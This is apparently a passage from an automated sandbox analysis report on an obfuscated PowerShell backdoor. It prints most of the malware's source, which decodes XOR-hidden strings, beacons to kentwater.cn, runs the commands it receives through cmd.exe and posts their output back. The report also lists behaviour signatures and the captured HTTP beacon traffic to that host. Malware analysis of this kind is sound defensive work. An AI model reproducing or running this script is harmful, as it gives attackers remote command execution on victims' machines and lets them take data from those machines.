= 53213 -bxor 53161;$cL4OLMozllhTOvN0 = [System.Text.Encoding]::UTF8.GetString($i_yupXum9o4A01);$em9ZbV = $cL4OLMozllhTOvN0;$jW3dX = $env:APPDATA + '\' + $em9ZbV;$H6Rq5fB4aky27 = 'pVhWrpfLw1HlIv2e0mKk';$hdeNFbCBu6QgOZV001 = 'maHtOIXxL4H1dpTrLhaD';$hdeNFbCBu6QgOZV001 = [System.Text.Encoding]::UTF8.GetBytes($hdeNFbCBu6QgOZV001);$hdeNFbCBu6QgOZV001[0] = 14735 -bxor 14784;$hdeNFbCBu6QgOZV001[1] = 50810 -bxor 50716;$hdeNFbCBu6QgOZV001[2] = 56841 -bxor 56943;$hdeNFbCBu6QgOZV001[3] = 2786 -bxor 2699;$hdeNFbCBu6QgOZV001[4] = 36501 -bxor 36598;$hdeNFbCBu6QgOZV001[5] = 14180 -bxor 14081;$hdeNFbCBu6QgOZV001[6] = 64650 -bxor 64726;$hdeNFbCBu6QgOZV001[7] = 26751 -bxor 26640;$hdeNFbCBu6QgOZV001[8] = 64146 -bxor 64226;$hdeNFbCBu6QgOZV001[9] = 20928 -bxor 20916;$hdeNFbCBu6QgOZV001[10] = 53051 -bxor 53074;$hdeNFbCBu6QgOZV001[11] = 47608 -bxor 47511;$hdeNFbCBu6QgOZV001[12] = 22734 -bxor 22688;$hdeNFbCBu6QgOZV001[13] = 44933 -bxor 45017;$hdeNFbCBu6QgOZV001[14] = 16707 -bxor 16694;$hdeNFbCBu6QgOZV001[15] = 16066 -bxor 16050;$hdeNFbCBu6QgOZV001[16] = 19562 -bxor 19470;$hdeNFbCBu6QgOZV001[17] = 14290 -bxor 14259;$hdeNFbCBu6QgOZV001[18] = 64053 -bxor 64065;$hdeNFbCBu6QgOZV001[19] = 52106 -bxor 52207;$H6Rq5fB4aky27 = [System.Text.Encoding]::UTF8.GetString($hdeNFbCBu6QgOZV001); $fv0na8jKt8 = $H6Rq5fB4aky27;HsnmKyIW4V($fv0na8jKt8);while ($true){$kwMplBvRq2zt = '';$b2ZuuGw = 'Auc562ufGzyBeD';$U1jgVr9t01 = 'Up7wMMVScRE5Fh';$U1jgVr9t01 = [System.Text.Encoding]::UTF8.GetBytes($U1jgVr9t01);$U1jgVr9t01[0] = 62752 -bxor 62807;$U1jgVr9t01[1] = 47460 -bxor 47405;$U1jgVr9t01[2] = 26476 -bxor 26458;$U1jgVr9t01[3] = 20905 -bxor 20952;$U1jgVr9t01[4] = 12842 -bxor 12870;$U1jgVr9t01[5] = 42712 -bxor 42729;$U1jgVr9t01[6] = 31801 -bxor 31754;$U1jgVr9t01[7] = 37246 -bxor 37199;$U1jgVr9t01[8] = 35733 -bxor 35780;$U1jgVr9t01[9] = 47302 -bxor 47348;$U1jgVr9t01[10] = 23154 -bxor 23100;$U1jgVr9t01[11] = 37942 -bxor 37980;$U1jgVr9t01[12] = 32836 -bxor 32808;$U1jgVr9t01[13] = 35471 -bxor 35578;$b2ZuuGw = [System.Text.Encoding]::UTF8.GetString($U1jgVr9t01);$iuwAqApqcmXkAO = $b2ZuuGw;$pkSm2KoWGmydHl = 'gx68xiwFQubpVyqw53cUF9VUTzYtTJdJQh';$J6czkLmSPP01 = 'Amm0QsmzrP9n7LV4yXGOsTLSlTsBftEjW3';$J6czkLmSPP01 = [System.Text.Encoding]::UTF8.GetBytes($J6czkLmSPP01);$J6czkLmSPP01[0] = 15494 -bxor 15602;$J6czkLmSPP01[1] = 51078 -bxor 51199;$J6czkLmSPP01[2] = 60739 -bxor 60723;$J6czkLmSPP01[3] = 22199 -bxor 22226;$J6czkLmSPP01[4] = 62504 -bxor 62485;$J6czkLmSPP01[5] = 11129 -bxor 11034;$J6czkLmSPP01[6] = 5008 -bxor 5119;$J6czkLmSPP01[7] = 41878 -bxor 41979;$J6czkLmSPP01[8] = 8100 -bxor 8137;$J6czkLmSPP01[9] = 39566 -bxor 39663;$J6czkLmSPP01[10] = 7666 -bxor 7580;$J6czkLmSPP01[11] = 53922 -bxor 53958;$J6czkLmSPP01[12] = 48490 -bxor 48460;$J6czkLmSPP01[13] = 32205 -bxor 32169;$J6czkLmSPP01[14] = 45935 -bxor 45830;$J6czkLmSPP01[15] = 65532 -bxor 65422;$J6czkLmSPP01[16] = 52874 -bxor 52975;$J6czkLmSPP01[17] = 44326 -bxor 44357;$J6czkLmSPP01[18] = 14151 -bxor 14131;$J6czkLmSPP01[19] = 46007 -bxor 46046;$J6czkLmSPP01[20] = 58204 -bxor 58163;$J6czkLmSPP01[21] = 15091 -bxor 15005;$J6czkLmSPP01[22] = 36865 -bxor 36924;$J6czkLmSPP01[23] = 13189 -bxor 13303;$J6czkLmSPP01[24] = 24261 -bxor 24224;$J6czkLmSPP01[25] = 617 -bxor 522;$J6czkLmSPP01[26] = 1398 -bxor 1299;$J6czkLmSPP01[27] = 19254 -bxor 19295;$J6czkLmSPP01[28] = 47697 -bxor 47655;$J6czkLmSPP01[29] = 52994 -bxor 53095;$J6czkLmSPP01[30] = 14975 -bxor 14937;$J6czkLmSPP01[31] = 24397 -bxor 24356;$J6czkLmSPP01[32] = 28344 -bxor 28380;$J6czkLmSPP01[33] = 43809 -bxor 43804;$pkSm2KoWGmydHl = [System.Text.Encoding]::UTF8.GetString($J6czkLmSPP01);$HCp0q = S54m3xeK($pkSm2KoWGmydHl + $SG6M0ouk2cQUfpHV);$finalUrl = $nh8ZPuNg4pK3aOp + $HCp0q;$qr27kycI = [System.Net.WebRequest]::Create($nh8ZPuNg4pK3aOp + $HCp0q);try{$F09ffIubQJm = $qr27kycI.GetResponse();} catch {$OURFvRexTaeE23zV = Get-Random -Maximum 60;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;continue;}$AGDFmtT = $F09ffIubQJm.StatusCode;$CGDqIISmGvhx84xp = 'aB1L';$Z3PnDkPyrJM73T01 = 'IOk1';$Z3PnDkPyrJM73T01 = [System.Text.Encoding]::UTF8.GetBytes($Z3PnDkPyrJM73T01);$Z3PnDkPyrJM73T01[0] = 9069 -bxor 8983;$Z3PnDkPyrJM73T01[1] = 26507 -bxor 26611;$Z3PnDkPyrJM73T01[2] = 28065 -bxor 28099;$Z3PnDkPyrJM73T01[3] = 19950 -bxor 19860;$CGDqIISmGvhx84xp = [System.Text.Encoding]::UTF8.GetString($Z3PnDkPyrJM73T01);$R4db3ayUHUw6A = $CGDqIISmGvhx84xp;$sr1olbnmchzR = '3HjQh';$BmOthTTBpzx601 = 'DSc4W';$BmOthTTBpzx601 = [System.Text.Encoding]::UTF8.GetBytes($BmOthTTBpzx601);$BmOthTTBpzx601[0] = 11248 -bxor 11139;$BmOthTTBpzx601[1] = 26060 -bxor 26040;$BmOthTTBpzx601[2] = 5138 -bxor 5235;$BmOthTTBpzx601[3] = 50639 -bxor 50621;$BmOthTTBpzx601[4] = 40904 -bxor 40892;$sr1olbnmchzR = [System.Text.Encoding]::UTF8.GetString($BmOthTTBpzx601);$gha9dupC = $sr1olbnmchzR;$ud3JSBmy = '7WSFDu';$laADOozsqXRnUEKX01 = 'zdl0r0';$laADOozsqXRnUEKX01 = [System.Text.Encoding]::UTF8.GetBytes($laADOozsqXRnUEKX01);$laADOozsqXRnUEKX01[0] = 1291 -bxor 1378;$laADOozsqXRnUEKX01[1] = 18218 -bxor 18253;$laADOozsqXRnUEKX01[2] = 33393 -bxor 33311;$laADOozsqXRnUEKX01[3] = 25622 -bxor 25721;$laADOozsqXRnUEKX01[4] = 1288 -bxor 1402;$laADOozsqXRnUEKX01[5] = 4445 -bxor 4408;$ud3JSBmy = [System.Text.Encoding]::UTF8.GetString($laADOozsqXRnUEKX01);$GdD5nwImmlfb = $ud3JSBmy;If ($AGDFmtT -eq 200){$x1XuBfdP = New-Object System.IO.StreamReader $F09ffIubQJm.GetResponseStream();$xYlVKzM=$x1XuBfdP.ReadToEnd();if (!$xYlVKzM.Contains('Fail')){if ($xYlVKzM.Contains($R4db3ayUHUw6A)){$INTZ_4FIYL = $xYlVKzM.Substring(16);$aSzFooViwhHMOS = 'Qe6gShw2HEk48NuJdH08FFLNZ9SDUu';$QmtbPoE501 = 'iXit2bA102BXNLHDtLO9qEgZ18C8ml';$QmtbPoE501 = [System.Text.Encoding]::UTF8.GetBytes($QmtbPoE501);$QmtbPoE501[0] = 42900 -bxor 42976;$QmtbPoE501[1] = 1496 -bxor 1441;$QmtbPoE501[2] = 63438 -bxor 63422;$QmtbPoE501[3] = 45050 -bxor 44959;$QmtbPoE501[4] = 56917 -bxor 56936;$QmtbPoE501[5] = 522 -bxor 632;$QmtbPoE501[6] = 4611 -bxor 4710;$QmtbPoE501[7] = 16552 -bxor 16603;$QmtbPoE501[8] = 18031 -bxor 17946;$QmtbPoE501[9] = 24549 -bxor 24457;$QmtbPoE501[10] = 65415 -bxor 65523;$QmtbPoE501[11] = 53065 -bxor 53103;$QmtbPoE501[12] = 56 -bxor 92;$QmtbPoE501[13] = 3692 -bxor 3589;$QmtbPoE501[14] = 16896 -bxor 17010;$QmtbPoE501[15] = 32257 -bxor 32356;$QmtbPoE501[16] = 34225 -bxor 34258;$QmtbPoE501[17] = 23229 -bxor 23241;$QmtbPoE501[18] = 58075 -bxor 58034;$QmtbPoE501[19] = 874 -bxor 773;$QmtbPoE501[20] = 18856 -bxor 18886;$QmtbPoE501[21] = 14808 -bxor 14821;$QmtbPoE501[22] = 13100 -bxor 13151;$QmtbPoE501[23] = 32024 -bxor 32125;$QmtbPoE501[24] = 48573 -bxor 48595;$QmtbPoE501[25] = 29557 -bxor 29457;$QmtbPoE501[26] = 35754 -bxor 35724;$QmtbPoE501[27] = 18256 -bxor 18233;$QmtbPoE501[28] = 10302 -bxor 10330;$QmtbPoE501[29] = 31470 -bxor 31443;$aSzFooViwhHMOS = [System.Text.Encoding]::UTF8.GetString($QmtbPoE501);$Ucwy0 = $aSzFooViwhHMOS;$aerNl = 'KfG0B';$avSeb2v01 = '21Oa4';$avSeb2v01 = [System.Text.Encoding]::UTF8.GetBytes($avSeb2v01);$avSeb2v01[0] = 26583 -bxor 26547;$avSeb2v01[1] = 13113 -bxor 13144;$avSeb2v01[2] = 56692 -bxor 56576;$avSeb2v01[3] = 45665 -bxor 45568;$avSeb2v01[4] = 50960 -bxor 50989;$aerNl = [System.Text.Encoding]::UTF8.GetString($avSeb2v01);$RrQmsQ = $aerNl;$HCp0q = S54m3xeK($Ucwy0 + $SG6M0ouk2cQUfpHV);$kwMplBvRq2zt = $nh8ZPuNg4pK3aOp + $HCp0q;if ($INTZ_4FIYL.Contains($gha9dupC)){cmd.exe /c $INTZ_4FIYL;$Zcg1A0Ue7OSiFQKP = 'M0';$TwnAoLGHUy01 = 'Ja';$TwnAoLGHUy01 = [System.Text.Encoding]::UTF8.GetBytes($TwnAoLGHUy01);$TwnAoLGHUy01[0] = 49887 -bxor 49808;$TwnAoLGHUy01[1] = 17974 -bxor 18045;$Zcg1A0Ue7OSiFQKP = [System.Text.Encoding]::UTF8.GetString($TwnAoLGHUy01);$BK7qm = $Zcg1A0Ue7OSiFQKP;} elseif($INTZ_4FIYL.Contains($GdD5nwImmlfb)){$INTZ_4FIYL = $INTZ_4FIYL.Substring(7);cmd.exe /c $INTZ_4FIYL;$wq95SC = 'alz2ozVEx';$SSe4s9RT4FU301 = '7VbvRmaFz';$SSe4s9RT4FU301 = [System.Text.Encoding]::UTF8.GetBytes($SSe4s9RT4FU301);$SSe4s9RT4FU301[0] = 29420 -bxor 29347;$SSe4s9RT4FU301[1] = 5355 -bxor 5280;$SSe4s9RT4FU301[2] = 2532 -bxor 2491;$SSe4s9RT4FU301[3] = 10724 -bxor 10669;$SSe4s9RT4FU301[4] = 42947 -bxor 42916;$SSe4s9RT4FU301[5] = 33012 -bxor 32922;$SSe4s9RT4FU301[6] = 37054 -bxor 37073;$SSe4s9RT4FU301[7] = 39326 -bxor 39404;$SSe4s9RT4FU301[8] = 17635 -bxor 17542;$wq95SC = [System.Text.Encoding]::UTF8.GetString($SSe4s9RT4FU301);$BK7qm = $wq95SC;} else {cmd.exe /c $INTZ_4FIYL > $jW3dX;$BK7qm = [System.IO.File]::ReadAllText($jW3dX);}$ltymfR5pSPm405Rv = $xYlVKzM + [Environment]::NewLine + $BK7qm;$jBTtUYqXEU_a = SWWZUOAn($ltymfR5pSPm405Rv);$rg32vOo1DUImKMD = [System.Web.HttpUtility]::UrlEncode($jBTtUYqXEU_a);$iuwAqApqcmXkAO = $RrQmsQ + $rg32vOo1DUImKMD;}}}$F09ffIubQJm.Close();if ($kwMplBvRq2zt -ne ''){LuXhxzm2KtHSmTxS $kwMplBvRq2zt $iuwAqApqcmXkAO;}$OURFvRexTaeE23zV = Get-Random -Maximum 15;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;}}HpWPuNxj; filepath: PowerShell	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 3032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x03f70000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 13, 2023, 9:53 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (9 events)

Data received	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Jun 2023 00:53:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Vary: User-Agent
Data received	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Jun 2023 00:53:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Vary: User-Agent
Data received	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Jun 2023 00:54:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Vary: User-Agent
Data received	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Jun 2023 00:54:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Vary: User-Agent
Data received	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Jun 2023 00:54:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Vary: User-Agent
Data received	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Jun 2023 00:54:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Vary: User-Agent
Data received	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Jun 2023 00:54:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Vary: User-Agent
Data received	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Jun 2023 00:55:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Vary: User-Agent
Data received	HTTP/1.1 200 OK Server: nginx Date: Tue, 13 Jun 2023 00:55:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Vary: User-Agent

Poweshell is sending data to a remote host (9 events)

Data sent	GET /caches/caches_template/user/index.php?z1sUfI=gi8u3&7Aq42=Gub3nUqdgYFKP8Bf&Xi7cSqs=MwwSVlM2HgkKOCgvdlwrFCIWFloBO0wWAjojIiZdZA8jSDR2OAEnIC4gCh0SfA&o43vz0Wd=DUdJK95 HTTP/1.1 Host: kentwater.cn Connection: Keep-Alive
Data sent	GET /caches/caches_template/user/index.php?SN6vlWX5=0szj7BZlSTNRF&l9L7t85E1=P9KV5iWFmfb&9il5=AQ3BbrwCUXu1&kzwDru=rp3yzGvbSNwQ&u8dw2=8uLpU5jDOHdsrPly&D4yaJKE=TAw8FWhWBSkiKQoXVDQFC10WOBk6W1c2KisBGgQ1ShBcSBo1A2E8AAYxKCUwFA&vRdFJALhu=bLMoFCsqn HTTP/1.1 Host: kentwater.cn
Data sent	GET /caches/caches_template/user/index.php?TlMcD0Ao=25IilUCF6y&TU1JA34g=Tyzc7puEYRS1O3Q&hregZ=UO7DwbvfTCphWZzq&Pcm50x6=ITZHIUoBGQs5Ih4McT4TAzAsQy0YDEsUMSAVASE_XBgxcmEBITYgIh06PD4VHg&IHGKOC=4UESkm HTTP/1.1 Host: kentwater.cn
Data sent	GET /caches/caches_template/user/index.php?lIc=1FOdISaB&9P71m=NqDdzlOor3fSQpIG&qPv7KDa=Ogg0AUcPIAIfUgg3dxQgNSsSMA0VAnIdF1ADOicVby4qTBIhLDgZKztKKgUTNA HTTP/1.1 Host: kentwater.cn
Data sent	GET /caches/caches_template/user/index.php?6v=GUrbi7L&vtfW8=sYghU7IQo21ftAXj&9eDt13B=ByAXDWhUJjwCU18CUiUxGBY6EwE6WXQjClFUDwIkfgMXZDEtA2MfFSZLfTA2BQ&Mz4s=UO2J0&g4VEDh=HjdIpfc HTTP/1.1 Host: kentwater.cn
Data sent	GET /caches/caches_template/user/index.php?VXRu=6kLbuY1aWeJmjO&LVfau=lH0D8E1OxtUGIkJR&RA6dcsU=GDFAIQUmXiIVFTsjbw8jIAkrRC1XKww9HRcwLj8ObDsIdWYBbhFnCzENGRELLw HTTP/1.1 Host: kentwater.cn
Data sent	GET /caches/caches_template/user/index.php?MXsl7LC8D=N7X1SoIhvZV&uFzOMrnj=M8FeRUNq1nP&qUMSj=7FeDtQP8Hk1csmZI&74bdWNa=Qz8VIUkyP1UlCl8HVQkzO1IlES0bP21KLQhUCgUIfCBTezMBIgUGfAESfTUxKQ&XKAn=WEen6 HTTP/1.1 Host: kentwater.cn
Data sent	GET /caches/caches_template/user/index.php?CAVOt6Npb=xjPDl6R&ydEJCl=MAErLBSCmOJG&4iGjK=4lSxO0qiNcfvm1H7&21Jn0lD=QBUjHXJTHgQjAggSS1UhRVEPJxEgXkwbKwADHxtUbl5QUQU9GWQnLQcaKiAvdQ&E9vtGu=ugi HTTP/1.1 Host: kentwater.cn
Data sent	GET /caches/caches_template/user/index.php?DNhmTrg6B=RLgh7dp3c2rTt&h=wap8I5&inu2wpr5G=bKXDenjoQ&2JptK=y7gAKRvqBtib8mpu&F9umKUj=DU4XJHYxGRwvFQcGHgkZBxxUEygkPEsDJxcMC04IVhwdCjEEHQYgNQsNJTR6KQ&7=ugwN HTTP/1.1 Host: kentwater.cn

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 13, 2023, 9:53 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	PowerShell $ElksyKqgq = 'NzXwsdKH4mhsJlZ';$dS1me690PeF01 = 'yPY0RHrDa5fVEbN';$dS1me690PeF01 = [System.Text.Encoding]::UTF8.GetBytes($dS1me690PeF01);$dS1me690PeF01[0] = 33312 -bxor 33350;$dS1me690PeF01[1] = 5894 -bxor 5980;$dS1me690PeF01[2] = 53821 -bxor 53844;$dS1me690PeF01[3] = 24611 -bxor 24676;$dS1me690PeF01[4] = 2604 -bxor 2585;$dS1me690PeF01[5] = 43144 -bxor 43234;$dS1me690PeF01[6] = 41855 -bxor 41806;$dS1me690PeF01[7] = 41245 -bxor 41330;$dS1me690PeF01[8] = 43527 -bxor 43583;$dS1me690PeF01[9] = 53707 -bxor 53667;$dS1me690PeF01[10] = 61928 -bxor 61853;$dS1me690PeF01[11] = 4996 -bxor 5066;$dS1me690PeF01[12] = 27428 -bxor 27470;$dS1me690PeF01[13] = 54354 -bxor 54282;$dS1me690PeF01[14] = 35537 -bxor 35463;$ElksyKqgq = [System.Text.Encoding]::UTF8.GetString($dS1me690PeF01);$qPaINTp8mf0 = $ElksyKqgq;function whKgZ($yTCpQOfKack, $xYlVKzM){$rCjLJasyf0m7 = [System.Text.Encoding]::UTF8;$CRABmSSX_ = $rCjLJasyf0m7.GetBytes($yTCpQOfKack);$LyZoc7Ykbs = $rCjLJasyf0m7.GetBytes($xYlVKzM);for ($i=0; $i -lt $LyZoc7Ykbs.length;){for ($j =0; $j -lt $CRABmSSX_.length; $j++){$LyZoc7Ykbs[$i] = $LyZoc7Ykbs[$i] -bxor $CRABmSSX_[$j];$i++;if ($i -ge $LyZoc7Ykbs.length){$j = $CRABmSSX_.length;}}}$ySwqdHx8Dh = [System.Convert]::ToBase64String($LyZoc7Ykbs);$ySwqdHx8Dh = $ySwqdHx8Dh.replace('+', '-').replace('/', '_').replace('=', '');return $ySwqdHx8Dh;}function mdkinhmi0xs63xl($Ube5aXEYlM7){return (-join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) \| Get-Random -Count $Ube5aXEYlM7 \| % {[char]$_}));}function S54m3xeK($nmLUVYfYimhN){$BMxL1 = mdkinhmi0xs63xl(5);$RznphCP = mdkinhmi0xs63xl(7);$xwhlQbRfEg_wwKF = mdkinhmi0xs63xl(16);$V4yUZ8nNguf7 = whKgZ $xwhlQbRfEg_wwKF $nmLUVYfYimhN;$BK7qm = '';$eWPzX = Get-Random -Maximum 5;for ($i = 0; $i -lt $eWPzX; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 16 -Minimum 5;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}if ($BK7qm -eq ''){$BK7qm = $BK7qm + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;} else {$BK7qm = $BK7qm + '&' + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;}$QQ3mvz = Get-Random -Maximum 3;for ($i = 0; $i -lt $QQ3mvz; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 12 -Minimum 1;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}return '?' + $BK7qm;}$T0c4GnRZL0 = 'o8DP9rn5zE1kaF';$VqRvR7u01 = 'rbbyGdyuIHnQEO';$VqRvR7u01 = [System.Text.Encoding]::UTF8.GetBytes($VqRvR7u01);$VqRvR7u01[0] = 3928 -bxor 3898;$VqRvR7u01[1] = 11945 -bxor 11931;$VqRvR7u01[2] = 21808 -bxor 21873;$VqRvR7u01[3] = 25530 -bxor 25550;$VqRvR7u01[4] = 23678 -bxor 23601;$VqRvR7u01[5] = 48796 -bxor 48876;$VqRvR7u01[6] = 55455 -bxor 55513;$VqRvR7u01[7] = 65244 -bxor 65202;$VqRvR7u01[8] = 23263 -bxor 23189;$VqRvR7u01[9] = 38044 -bxor 38133;$VqRvR7u01[10] = 10093 -bxor 10027;$VqRvR7u01[11] = 62542 -bxor 62470;$VqRvR7u01[12] = 48053 -bxor 48124;$VqRvR7u01[13] = 45810 -bxor 45719;$T0c4GnRZL0 = [System.Text.Encoding]::UTF8.GetString($VqRvR7u01);$ANNaEKn24PF = $T0c4GnRZL0;function SWWZUOAn($yPvXZCD3UDvC_1I7){return [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));}function LiYMh74($yPvXZCD3UDvC_1I7){$b64str = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));return $b64str.replace('+', '-').replace('/', '_').replace('=', '');}function LuXhxzm2KtHSmTxS($OOa9P1cGqThqWwO3, $WnI_R){$SUZgLOy = [System.Text.Encoding]::UTF8.GetBytes($WnI_R);[System.Net.HttpWebRequest] $hcAiTwqCt9PwT = [System.Net.WebRequest]::Create($OOa9P1cGqThqWwO3);$U_NUkepb71Q = 's1lb';$AXQigUrD6uwklW01 = 'cc3g';$AXQigUrD6uwklW01 = [System.Text.Encoding]::UTF8.GetBytes($AXQigUrD6uwklW01);$AXQigUrD6uwklW01[0] = 28594 -bxor 28642;$AXQigUrD6uwklW01[1] = 7544 -bxor 7479;$AXQigUrD6uwklW01[2] = 14992 -bxor 15043;$AXQigUrD6uwklW01[3] = 65336 -bxor 65388;$U_NUkepb71Q = [System.Text.Encoding]::UTF8.GetString($AXQigUrD6uwklW01);$hcAiTwqCt9PwT.Method = $U_NUkepb71Q;$frNzen = 'x0ymi50wOBCHMa0vesHUk0hjaQq9yd1VV';$S9ybl01 = '7ZX6LiBugDgzhtuC3mTvXB60vUCC2aeFY';$S9ybl01 = [System.Text.Encoding]::UTF8.GetBytes($S9ybl01);$S9ybl01[0] = 46122 -bxor 46155;$S9ybl01[1] = 23347 -bxor 23363;$S9ybl01[2] = 58757 -bxor 58869;$S9ybl01[3] = 51395 -bxor 51375;$S9ybl01[4] = 9968 -bxor 9881;$S9ybl01[5] = 37098 -bxor 37001;$S9ybl01[6] = 55070 -bxor 55167;$S9ybl01[7] = 48095 -bxor 48043;$S9ybl01[8] = 48069 -bxor 48044;$S9ybl01[9] = 29814 -bxor 29721;$S9ybl01[10] = 49656 -bxor 49558;$S9ybl01[11] = 10102 -bxor 10073;$S9ybl01[12] = 51918 -bxor 51894;$S9ybl01[13] = 451 -bxor 494;$S9ybl01[14] = 20934 -bxor 20913;$S9ybl01[15] = 52408 -bxor 52431;$S9ybl01[16] = 40458 -bxor 40573;$S9ybl01[17] = 3704 -bxor 3669;$S9ybl01[18] = 8554 -bxor 8460;$S9ybl01[19] = 42369 -bxor 42478;$S9ybl01[20] = 2424 -bxor 2314;$S9ybl01[21] = 6571 -bxor 6598;$S9ybl01[22] = 28974 -bxor 28931;$S9ybl01[23] = 37068 -bxor 37049;$S9ybl01[24] = 9358 -bxor 9468;$S9ybl01[25] = 51114 -bxor 51142;$S9ybl01[26] = 10436 -bxor 10401;$S9ybl01[27] = 27496 -bxor 27398;$S9ybl01[28] = 20560 -bxor 20531;$S9ybl01[29] = 47641 -bxor 47734;$S9ybl01[30] = 43655 -bxor 43747;$S9ybl01[31] = 40920 -bxor 40893;$S9ybl01[32] = 7073 -bxor 7109;$frNzen = [System.Text.Encoding]::UTF8.GetString($S9ybl01);$hcAiTwqCt9PwT.ContentType = $frNzen;$hcAiTwqCt9PwT.ContentLength = $SUZgLOy.Length;try{$eLj81Oe = $hcAiTwqCt9PwT.GetRequestStream();$eLj81Oe.Write($SUZgLOy, 0, $SUZgLOy.Length);$eLj81Oe.Flush();$eLj81Oe.Close();[System.Net.HttpWebResponse] $jUYS0IdI = $hcAiTwqCt9PwT.GetResponse();$kHx3AO8E = New-Object System.IO.StreamReader($jUYS0IdI.GetResponseStream());$BK7qm = $kHx3AO8E.ReadToEnd();return $BK7qm;} catch {return '';}}function HsnmKyIW4V($wj_uC5xvtcOmXJ){$arEdmGvRqoSs = '3MAHqhnlu03NTncqN8SgQh5sFjssvVNpZzTs6GSqD4Kh2t6AH';$YGF4zEt9ImmOq8V01 = 'uv0m16W4c6b0q05fjNAIs75vvYfptNUZSy2FmYzauDl06kKtb';$YGF4zEt9ImmOq8V01 = [System.Text.Encoding]::UTF8.GetBytes($YGF4zEt9ImmOq8V01);$YGF4zEt9ImmOq8V01[0] = 441 -bxor 468;$YGF4zEt9ImmOq8V01[1] = 30585 -bxor 30474;$YGF4zEt9ImmOq8V01[2] = 36323 -bxor 36235;$YGF4zEt9ImmOq8V01[3] = 37198 -bxor 37178;$YGF4zEt9ImmOq8V01[4] = 40078 -bxor 40175;$YGF4zEt9ImmOq8V01[5] = 38586 -bxor 38554;$YGF4zEt9ImmOq8V01[6] = 60840 -bxor 60864;$YGF4zEt9ImmOq8V01[7] = 46333 -bxor 46217;$YGF4zEt9ImmOq8V01[8] = 65258 -bxor 65182;$YGF4zEt9ImmOq8V01[9] = 24688 -bxor 24576;$YGF4zEt9ImmOq8V01[10] = 28202 -bxor 28176;$YGF4zEt9ImmOq8V01[11] = 21153 -bxor 21134;$YGF4zEt9ImmOq8V01[12] = 19285 -bxor 19322;$YGF4zEt9ImmOq8V01[13] = 17638 -bxor 17558;$YGF4zEt9ImmOq8V01[14] = 23888 -bxor 23845;$YGF4zEt9ImmOq8V01[15] = 64778 -bxor 64871;$YGF4zEt9ImmOq8V01[16] = 28327 -bxor 28375;$YGF4zEt9ImmOq8V01[17] = 47484 -bxor 47377;$YGF4zEt9ImmOq8V01[18] = 36253 -bxor 36338;$YGF4zEt9ImmOq8V01[19] = 24347 -bxor 24431;$YGF4zEt9ImmOq8V01[20] = 18501 -bxor 18474;$YGF4zEt9ImmOq8V01[21] = 36431 -bxor 36413;$YGF4zEt9ImmOq8V01[22] = 58881 -bxor 58927;$YGF4zEt9ImmOq8V01[23] = 48386 -bxor 48492;$YGF4zEt9ImmOq8V01[24] = 30443 -bxor 30350;$YGF4zEt9ImmOq8V01[25] = 4839 -bxor 4755;$YGF4zEt9ImmOq8V01[26] = 